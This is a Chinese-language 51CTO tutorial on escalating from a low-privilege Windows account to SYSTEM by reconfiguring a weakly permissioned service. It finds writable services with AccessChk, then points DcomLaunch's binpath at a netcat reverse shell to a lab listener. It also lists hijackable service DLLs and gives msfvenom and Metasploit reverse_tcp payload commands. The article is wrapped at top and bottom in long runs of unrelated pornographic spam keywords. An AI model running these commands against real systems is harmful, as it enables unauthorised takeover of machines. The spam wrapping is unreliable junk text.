国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

Windows低權限進程或服務提權

原創
安全 網站安全 應用安全
在實際滲透過程中,有可能獲取了該操作系統下的一個普通用戶帳號權限,或者webshell權限,通過低權限用戶進行越權,有可能獲取系統權限;其利用原理是本文要介紹的內容。

【51CTO.com原創稿件】在實際滲透過程中,有可能獲取了該操作系統下的一個普通用戶帳號權限,或者webshell權限,通過低權限用戶進行越權,有可能獲取系統權限;其利用原理主要是通過微軟的AccessChk工具軟件,配合sc來操作服務,通過服務的重啟而得到權限。

一、AccessChk簡介及使用

1. AccessChk簡介

AccessChk是Sysinternals中的一個小工具,目前最新版本為6.1,新版本存在一些bug,在實際使用時會提示需要多個dll文件,在本案例中使用的是3.0版本,其官方網站下載地址:https://technet.microsoft.com/en-us/Sysinternals/bb664922.aspx

AccessChk主要用來檢查用戶和用戶組對文件,目錄,注冊表項,全局對象和系統服務的權限詳細情況,在實際配置過程中如果權限設置失誤,則就可以被用來提權。

2. 使用AccessChk

命令行下第一次運行需要同意一個許可,如果不想出現那個提示窗口,則可以執行“accesschk.exe /accepteula”。其主要參數如下:

  1. usage: accesschk [-s][-e][-u][-r][-w][-n][-v][[-a]|[-k]|[-p [-f] [-t]][-o [-t <object type>]][-c]|[-d]] [[-l [-i]]|[username]] <file, directory, registry key, process, service, object> 

這個命令分為三個部分accesschk是程序名;第一個參數有9個可選項[],部分可選項里還有可選參數;第二個參數是一個目標,這個目標可以是文件,目錄,注冊項,進程,服務,對象。

  • -a 名稱是Windows帳戶權限。指定“*”作為顯示所有分配給用戶的權限名稱,只有指定用戶名稱或者組時才顯示指派的權限。
  • -c 顯示服務名稱,“*”顯示所有服務。
  • -d 僅處理目錄或頂級鍵
  • -e 只顯示顯式設置完整性級別(Windows Vista和更高版本系統)
  • -f 顯示包含組和特權的完整過程令牌信息
  • -k 注冊表鍵值,例如 hklm\software
  • -i 在取消完全訪問控制列表時忽略只繼承繼承符的對象
  • -l 顯示全部訪問控制列表。添加“-I”忽略繼承ACEs
  • -n 僅顯示沒有訪問權限的對象
  • -o 名稱是對象管理器命名空間中的一個對象(默認是root)。查看一個目錄的內容,用反斜線或-S-T和對象類型指定名稱
  • -p 進程名或者PID,例如cmd.exe (使用 '*'顯示所有的進程). 加“-f ”顯示包括組和特權的所有進程令牌信息,加“-t”顯示線程。
  • -q 省略標識
  • -r 顯示對象只讀屬性
  • -s 遞歸
  • -t 對象類型篩選器
  • -u 抑制錯誤
  • -v 冗長(包括Windows Vista完整性級別)
  • -w 僅顯示具有寫訪問的對象

(1)查看用戶服務,查看管理員組、users組下所有服務:

  1. accesschk administrators -c * 
  2. accesschk users -c * 

如圖1所示,可以對某個用戶進行查看,主要用來提權用,例如查看simeon用戶具備讀寫服務器權限:

accesschk simeon -c * | find "RW" 或者accesschk simeon -cw *

查看指定用戶的服務權限

圖1查看指定用戶的服務權限

(2)查看用戶組對系統服務具備寫權限,如果有則會顯示,否則會提示“No matching objects found”。

  1. accesschk.exe -uwcqv "Authenticated Users" * 
  2. accesschk.exe -uwcqv "Administrators" * 
  3. accesschk.exe -uwcqv "Backup Operators" * 
  4. accesschk.exe -uwcqv "Distributed COM Users" * 
  5. accesschk.exe -uwcqv "Guests" * 
  6. accesschk.exe -uwcqv "HelpServicesGroup" * 
  7. accesschk.exe -uwcqv "IIS_WPG" * 
  8. accesschk.exe -uwcqv "Network Configuration Operators" * 
  9. accesschk.exe -uwcqv "Performance Monitor Users" * 
  10. accesschk.exe -uwcqv "Performance Log Users" * 
  11. accesschk.exe -uwcqv "Power Users" * 
  12. accesschk.exe -uwcqv "Print Operators" * 
  13. accesschk.exe -uwcqv "Remote Desktop Users" * 
  14. accesschk.exe -uwcqv "Replicator" * 
  15. accesschk.exe -uwcqv "TelnetClients" * 
  16. accesschk.exe -uwcqv "Users" * 

二、獲取低權限可操作服務名稱

1. 實驗環境

(1)本次實驗環境為Windows 2003 Sever SP3,用戶simeon屬于power user組,可以登錄系統。

(2)IP地址:192.168.52.175

(3)監聽服務IP:192.168.52.215

(4)nc.exe復制到c:\windows\temp目錄

2. 獲取可讀寫的服務

執行命令以下命令獲取Power Users組可以操作的服務名稱信息,如圖2所示。

  1. accesschk.exe -uwcqv "Power Users" * 

執行后顯示結果如下:

  1. RW DcomLaunch 
  2.         SERVICE_QUERY_STATUS 
  3.         SERVICE_QUERY_CONFIG 
  4.         SERVICE_CHANGE_CONFIG 
  5.         SERVICE_INTERROGATE 
  6.         SERVICE_ENUMERATE_DEPENDENTS 
  7.         READ_CONTROL 
  8. RW kdc 
  9.         SERVICE_QUERY_STATUS 
  10.         SERVICE_QUERY_CONFIG 
  11.         SERVICE_CHANGE_CONFIG 
  12.         SERVICE_INTERROGATE 
  13.         SERVICE_ENUMERATE_DEPENDENTS 
  14.         READ_CONTROL 

獲取可讀寫的服務名稱信息

圖2獲取可讀寫的服務名稱信息

3. 查詢服務詳細信息

服務名稱為“DcomLaunch”、“kdc”可以被simeon用戶進行操作。使用sc qc kdc命令查詢kdc服務的詳細信息,如圖3所示,可以看到該服務是以系統權限運行的。

獲取可讀寫的服務名稱信息

圖3查詢kdc服務詳細信息

4 .決定使用那個服務

執行命令“net start”查看系統目前已經啟動的服務,也可以使用以下命令直接獲取。如圖4所示,在啟動服務列表中發現“DCOM Server Process Launcher”服務名稱。

  1. net start | find "DCOM Server Process Launcher"  
  2. net start | find "Kerberos Key Distribution Center" 

獲取服務名稱

圖4獲取服務名稱

5. 獲取服務名稱對應的服務

使用命令“tasklist /svc”,如圖5所示,獲取“DCOM Server Process Launcher”服務名稱所對應的服務“DcomLaunch”。

獲取DcomLaunch服務信息

圖5獲取DcomLaunch服務信息

三、修改服務并獲取系統權限

1. 修改服務參數binpath值

使用sc命令對服務進行修改:

  1. sc config DcomLaunch binpath"C:\windows\temp\nc.exe -nv 192.168.52.215 4433 -e C:\WINDOWS\System32\cmd.exe" 

如圖6所示,執行命令后,顯示修改服務配置成功,再次使用sc qc DcomLaunch,顯示執行文件已經更改為:

  1. C:\windows\temp\nc.exe -nv 192.168.52.215 4433 -e C:\WINDOWS\System32\cmd.exe 

查詢服務:sc qc DcomLaunch

修改服務binpath值

圖6修改服務binpath值

2. 啟動服務

先執行 sc config DcomLaunch obj= ".\LocalSystem" password= "",然后通過命令下啟動,使用“net start DcomLaunch”命令,也可以通過services.msc服務管理器重啟該服務,如圖7所示。

重新啟動服務

圖7重新啟動服務

3. 反彈獲取服務器權限

如圖8所示,在反彈服務器中192.168.52.215監聽4433端口,成功獲取來自192.168.52.175的反彈,且為系統權限。

反彈獲取系統權限

圖8反彈獲取系統權限

4. 總結

在Winxp、Windows 2003、Windows 7 (32/64)下有一些dll文件也可以被替換:

  1. IKE and AuthIP IPsec Keying Modules (IKEEXT)    – wlbsctrl.dll 
  2. Windows Media Center Receiver Service (ehRecvr)    – ehETW.dll 
  3. Windows Media Center Scheduler Service (ehSched)  – ehETW.dll 
  4. Automatic Updates (wuauserv)    – ifsproxy.dll 
  5. Remote Desktop Help Session Manager (RDSessMgr)–SalemHook.dll 
  6. Remote Access Connection Manager (RasMan)   – ipbootp.dll 
  7. Windows Management Instrumentation (winmgmt)    – wbemcore.dll 
  8. Audio Service (STacSV)    – SFFXComm.dll SFCOM.DLL  
  9. Intel(R) Rapid Storage Technology (IAStorDataMgrSvc)  – DriverSim.dll 
  10. Juniper Unified Network Service(JuniperAccessService) – dsLogService.dll 

(1)使用msf生成exe文件

Linux msf監聽4433端口

 

  1. ./msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.52.215 lport=4433 -f exe -o /tmp/my_payload.exe 

windows下監聽4433端口

  1. ./msfvenom -p windows/shel/reverse_tcp lhost=192.168.52.215 lport=4433 -f exe -o /tmp/w.exe 

其中平臺參數(-p)可以設置為以下的一些,也可以使用msfvenom -l payload | grep 'reverse'進行查看和選擇:

  1. windows/shell/reverse_tcp 
  2. windows/x64/shell_reverse_tcp 
  3. windows/shell_reverse_tcp 
  4. windows/shell/reverse_tcp 

(2)在msf上面執行

  1. set payload windows/meterpreter/reverse_tcp 
  2. show options 
  3. set lhost 192.168.52.215 
  4. set lport 4433 
  5. run 0 

(3)將生成的/tmp/my_payload.exe按照本文上面的方法執行后即可得到反彈的webshell

 

【51CTO原創稿件,合作站點轉載請注明原文作者和出處為51CTO.com】

責任編輯:趙寧寧 來源: 51CTO.com
相關推薦

2021-01-23 09:27:32

Windows10PrivescChec微軟

2021-01-13 08:14:36

Windows提權漏洞攻擊

2016-12-12 09:11:20

2020-11-16 10:55:41

Windows

2025-05-14 18:12:33

零日漏洞漏洞網絡攻擊

2011-03-07 11:36:23

FileZillaSe

2017-04-17 18:38:03

Windows提權漏洞

2016-09-26 14:40:25

Windows內網實用命令

2018-07-05 10:44:09

Windows提權漏洞

2017-04-17 20:08:19

2013-11-29 15:34:00

2021-05-01 20:52:30

漏洞網絡安全網絡攻擊

2023-06-11 17:24:26

2016-10-31 23:00:58

MySQLMOF方法提權數據庫安全

2009-09-17 14:11:53

2023-09-11 06:59:59

2021-12-09 18:59:53

提權漏洞漏洞攻擊

2009-07-25 16:52:29

2015-03-13 10:06:55

2019-12-01 22:34:42

提權web安全漏洞
點贊
收藏

51CTO技術棧公眾號

欧美3p视频在线观看| 国产激情二区| 97久久中文字幕| 色婷婷久久久久swag精品| 在线无限看免费粉色视频| 亲子伦视频一区二区三区| 精品国产麻豆免费人成网站| 免费高清视频日韩| 国产成人av电影在线| 青青草成人影院| 欧美狂野另类xxxxoooo| 国产日韩欧美精品在线观看| 成人免费视屏| 国产精品免费aⅴ片在线观看| 欧美一区国产一区| 美女精品一区最新中文字幕一区二区三区 | 欧美zozo另类异族| 在线观看免费网站| 亚洲国产经典视频| 国产免费一区二区三区四在线播放| 91精品一区二区三区综合| 欧美激情视频三区| 婷婷激情一区| 精品国产成人在线影院| 情趣视频网站在线免费观看| 欧美爱爱视频| 成人免费视频国产在线观看| 国产精品theporn88| 自拍亚洲一区| 久久韩国免费视频| 亚洲小少妇裸体bbw| 国产伦精品一区二区三区视频青涩 | 国产视频一区二区三区在线观看| 亚洲不卡1区| 日韩午夜一区| 97久草视频| 伊人色**天天综合婷婷| 国产成人欧美在线观看| 9l视频自拍蝌蚪9l视频成人 | 日韩电影一区| 亚洲国产日韩综合久久精品| 97色在线视频| 91精品尤物| 欧美成人午夜免费视在线看片| 91久久国产综合久久91猫猫| 国产白丝网站精品污在线入口| 日产精品高清视频免费| 国产精品一二| 亚洲深夜福利网站| freexxx性亚洲精品| 欧美一级欧美三级在线观看 | 激情一区二区三区| 亚洲精品人人| 亚洲大胆人体在线| 色综合999| 日韩欧美一级片| 136福利第一导航国产在线| 亚洲第一区中文99精品| 极品美鲍一区| 日韩亚洲精品电影| 91精品久久久久久综合五月天| 日韩中文第一页| 最新av中文字幕| 一区二区在线观看免费| 欧美xx网站| 欧美精品久久久久久久久老牛影院| 老司机精品影院| 亚洲欧美日韩精品久久亚洲区| 成人交换视频| 国产成人精品网站| 亚洲伦理精品| 亚洲一区综合| 国产三级欧美三级| 午夜影院观看视频免费| 欧美性色欧美a在线播放| 日日噜噜噜夜夜爽爽| 懂色av噜噜一区二区三区av| 日韩欧美视频网站| 亚洲一区在线电影| 免费高清在线观看| 少妇久久久久久| 欧美午夜精彩| 日韩欧美亚洲在线| 99久久99久久精品免费看蜜桃| 亚州黄色一级| 日韩午夜在线观看视频| 国产精品成人国产| 成人性教育视频在线观看| 日韩精品一二三| 三级在线视频观看| 欧美日韩亚洲国产综合| 成人片免费看| 国产精品毛片a∨一区二区三区|国| 日韩一级网站| 乱子伦视频在线看| 欧美日韩久久久| 久久亚洲国产精品尤物| 国产欧美精品一区二区| 岛国精品在线| 国产精品国产亚洲伊人久久| 久久中文欧美| 欧美 日韩 国产在线观看| 亚洲狼人综合干| 在线观看免费视频高清游戏推荐| 一卡二卡三卡日韩欧美| 麻豆av电影在线观看| 亚洲电影免费观看| jazzjazz国产精品久久| 国产高清一区视频| 国产精品一级二级三级| av 日韩 人妻 黑人 综合 无码| 亚洲欧美一区二区三区久本道91| free性护士videos欧美| 亚洲一区二区三区香蕉| 欧美国产激情一区二区三区蜜月| 毛片在线网站| 污片在线观看一区二区| **欧美日韩在线| 99中文字幕在线观看| 欧美乱妇15p| 91成人影院| 久草在.com| 久久6免费高清热精品| 国产精品资源在线看| 影音先锋男人在线资源| 国产精品视频免费一区二区三区| 亚洲国产精品久久久男人的天堂| 91在线一区| 欧美日韩在线一| 日韩精品免费在线视频| 石原莉奈在线亚洲二区| 麻豆传媒在线观看| 国产一级二级三级精品| 色婷婷精品久久二区二区蜜臀av| 欧美亚洲高清| 香港经典三级在线| 45www国产精品网站| 日韩免费特黄一二三区| 一区二区xxx| 欧美精品www| 国产欧美日韩亚州综合| 精品一区二区三区在线观看视频| 日本香蕉视频在线观看| 亚洲欧美国产制服动漫| 国产成人亚洲综合a∨猫咪| 亚洲精品动漫| 成年人网站国产| 欧美久久精品午夜青青大伊人| 久久久久久一级片| 激情亚洲另类图片区小说区| 色婷婷成人在线| 国产99视频在线观看| 久久人体大胆视频| 5566日本婷婷色中文字幕97| 99精品国产99久久久久久白柏| 偷拍精品精品一区二区三区| 中文字幕中文字幕在线中心一区 | 亚洲成人免费视频| 亚洲大全视频| а天堂中文在线官网| 青青草影院在线观看| www.亚洲一区| 亚洲一区在线看| 亚洲激情网站| 九色porny自拍视频在线播放| 久久久无码中文字幕久...| 久久久国产91| 亚洲一区二区精品视频| 99亚洲伊人久久精品影院红桃| 中文av在线全新| 午夜视频你懂的| 91免费综合在线| 日韩女优电影在线观看| 高清国产一区二区| 香蕉视频一区二区三区| 成黄免费在线| 欧美久久在线观看| 国产精品免费久久久| 日韩你懂的在线观看| 国产日韩高清在线| 精品二区久久| 国产精品亚洲欧美日韩一区在线 | 91精品国产自产在线老师啪| 91.com视频| 久久久久免费观看| 欧美天天视频| 91麻豆精品国产综合久久久 | 综合av第一页| 99精品视频免费观看视频| 欧美激情福利| 国产高清视频在线| 精品一区二区中文字幕| 成人av片网址| 色综合久久悠悠| 欧美三级欧美一级| 欧美国产在线观看| 国产日韩一区二区三区在线| 国产成人精品亚洲线观看| av网站在线免费看推荐| 97中文字幕|